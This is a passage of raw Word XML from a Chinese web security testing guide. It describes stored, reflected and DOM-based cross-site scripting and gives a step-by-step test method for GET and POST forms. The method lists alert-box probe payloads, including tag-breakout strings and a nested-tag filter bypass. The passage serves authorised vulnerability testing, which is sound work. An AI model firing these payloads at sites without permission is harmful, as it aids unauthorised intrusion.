                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3905E798"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else{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32928816"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w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>跨站请求攻击，注销会话</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A7B93FA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="348D2B80" w14:textId="13CD1727" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="00EF7E10" w:rsidP="007824E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58E04E9" w14:textId="002125A3" w:rsidR="00A944EF" w:rsidRPr="00AD537C" w:rsidRDefault="00A944EF" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc498434551"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>综合利用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="645F67E9" w14:textId="23CB51B1" w:rsidR="00A944EF" w:rsidRPr="00F757E4" w:rsidRDefault="00A944EF" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc498434552"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本攻击（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w14:paraId="0BAB89E8" w14:textId="319E0340" w:rsidR="00395F18" w:rsidRPr="00B8545D" w:rsidRDefault="00A944EF" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本攻击的英文全称是</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cross Site Script</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，为了和样式表区分，缩写为</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。发生的原因是网站将用户输入的内容输出到页面上，在这个过程中可能有恶意代码被浏览器执行。跨站脚本攻击</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它指的是恶意攻击者往</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面里插入恶意</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码，当用户浏览该页之时，嵌入其中</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码会被执行，从而达到恶意用户的特殊目的。已知的跨站脚本攻击漏洞有三种：</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）存储式；</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）反射式；</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）基于</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidR="00395F18" w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED64440" w14:textId="0BC4CB1B" w:rsidR="00395F18" w:rsidRPr="00B8545D" w:rsidRDefault="00395F18" w:rsidP="00B8545D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储型跨站脚本攻击涉及的功能点：用户输入的文本信息保存到数据库中，并能够在页面展示的功能点，例如用户留言、发送站内消息、个人信息修改等功能点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D052338" w14:textId="77777777" w:rsidR="00395F18" w:rsidRPr="00B8545D" w:rsidRDefault="00395F18" w:rsidP="00B8545D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>反射型跨站脚本攻击涉及的功能点：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数需要在页面显示的功能点都可能存在反射型跨站脚本攻击，例如站内搜索、查询功能点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1924D843" w14:textId="77777777" w:rsidR="00395F18" w:rsidRPr="00B8545D" w:rsidRDefault="00395F18" w:rsidP="00B8545D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站脚本攻击涉及的功能点：涉及</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的页面程序，包括（不限这些）：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>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tblGrid>
      <w:tr w:rsidR="00395F18" w:rsidRPr="00B8545D" w14:paraId="445341FF" w14:textId="77777777" w:rsidTr="006B4954">
        <w:trPr>
          <w:trHeight w:val="299"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="628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894FAB"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URL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC217FA"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URLUnencoded</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="041ECF41"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location</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D01A6CA"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referrer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3368535F"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window.location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DEB4706" w14:textId="77777777" w:rsidR="00A944EF" w:rsidRPr="00B8545D" w:rsidRDefault="00A944EF" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36108660" w14:textId="77777777" w:rsidR="00A944EF" w:rsidRPr="00B8545D" w:rsidRDefault="00A944EF" w:rsidP="00B8545D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A11BD0" w14:textId="77777777" w:rsidR="00EB160C" w:rsidRPr="00B8545D" w:rsidRDefault="00EB160C" w:rsidP="00B8545D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式跨站脚本：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B4B9F3"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在输入的参数后逐条添加以下语句，以第一条为例，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://www.exmaple.com/page.xxx?name=&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只要其中一条弹出显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的告警框，就说明存在跨站漏洞，记录漏洞，停止测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344E92BE"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如果没有弹出显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的告警框，则在返回的页面上单击鼠标右键，选择“查看源文件”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45605957"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查找网页源文件中是否包含完整的字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则不管有没有弹出显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的告警框，都表明存在跨站脚本漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C50420A"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由于有些</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;textarea&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或”）会影响脚本的执行，所以不一定能够正确弹出</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告警框，需要根据返回网页源文件的内容，构造</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，比如</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B160C" w:rsidRPr="00B8545D" w14:paraId="43866F51" w14:textId="77777777" w:rsidTr="006B4954">
        <w:trPr>
          <w:trHeight w:val="299"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="77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22E88"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多行文本输入框：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BFFA63"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extarea&gt;&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13F57FC9"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文本输入框：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C33F100"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 xml:space="preserve">&lt;/td&gt;&lt;script&gt;alert(123456)&lt;/script&gt;  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB16291"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lastRenderedPageBreak/>
              <w:t>'&gt;&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="531F3F2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70C672FD"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itle&gt;&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08363A1E"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23603B1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img]javascript:alert(123456)[/img]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC77895"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scrip&lt;script&gt;t&gt;alert(123456)&lt;/scrip&lt;/script&gt;t&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2869D1CF"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div&gt;&lt;Script&gt;alert(123456)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA2B854"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需要对页面上所有可以提交参数的地方进行测试。具体跨站脚本的测试语句根据实际情况的不同而不同，可自行构造，以及触发事件等切换，这里只列出了一些最常见构造语句。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1769598F" w14:textId="77777777" w:rsidR="00EB160C" w:rsidRPr="00B8545D" w:rsidRDefault="00EB160C" w:rsidP="00B8545D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式跨站脚本：</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D8257"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在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表单中逐条输入以下语句，只要其中一条弹出显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的对话框，就说明存在跨站漏洞，记录漏洞，停止测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E10B6"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rPr>
        <w:t>&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F3C613"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rPr>
        <w:t>[img]javascript:alert(123456);[/img]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0283F8"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如果没有弹出显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的告警框，则在返回的页面上单击鼠标右键，选择“查看源文件”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D9C5C"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查找网页源文件中是否包含完整的字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(123456)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则不管有没有弹出显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的告警框，都表明存在跨站脚本漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4490C"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由于有些</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元素（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;textarea&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或”）会影响脚本的执行，所以不一定能够正确弹出</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8545D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>123456</w:t>
      </w:r>
